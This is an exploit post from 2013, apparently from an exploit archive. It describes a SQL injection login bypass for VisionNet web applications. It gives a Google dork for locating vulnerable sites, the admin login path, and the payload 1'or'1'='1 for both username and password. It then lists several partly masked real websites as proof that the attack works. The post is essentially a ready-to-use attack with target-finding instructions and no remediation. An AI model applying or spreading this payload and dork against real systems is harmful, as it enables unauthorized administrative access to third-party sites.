Home / exploits VisionNet SQL Injection Bypass
Posted on 17 October 2013
#******************************************************************************** # Exploit Title : VisionNet SQL Injection Bypass # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://www.visionnet.com.mx # # Google Dork : intext:"Powered By VisionNet" filetype:asp # # Date: 2013/10/16 # # Tested on: Windows 7 , Linux ------------------------------------------------------------------- # Exploit : Login page bypass # # Location : [Target]/admin/Login.asp # # Username :1'or'1'='1 # # Password :1'or'1'='1 ###################### # Proof: # # http://comXXa.net/admin/Login.asp # # http://coXXincoln.edu.mx/admin/Login.asp # # http://www.visiXXt.com.mx/admin/Login.asp # # http://wildcaXXotierranueva.edu.mx/admin/Login.asp # ###################### discovered by : ACC3SS ######################
